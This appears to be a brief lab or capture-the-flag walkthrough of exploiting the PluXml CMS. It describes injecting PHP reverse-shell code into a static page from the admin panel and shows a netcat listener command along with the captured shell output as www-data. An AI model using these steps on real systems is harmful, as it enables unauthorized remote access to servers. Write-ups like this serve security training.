Exploiting PluXml
Log into admin panel [URL]/core/admin
Navigate to static page, modify a page and add PHP rev shell code
Start a listener on the the attacker machine
Save the page modifications and view the modifed page to get a shell
Last updated
sudo nc -lvnp 80┌──(pikey㉿kali)-[~]
└─$ sudo nc -lvnp 80
[sudo] password for pikey:
listening on [any] 80 ...
connect to [192.168.45.188] from (UNKNOWN) [192.168.238.28] 54104
Linux plum 5.10.0-23-amd64 #1 SMP Debian 5.10.179-1 (2023-05-12) x86_64 GNU/Linux
16:01:20 up 14 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
sh: 0: can't access tty; job control turned off
$ whoami
www-data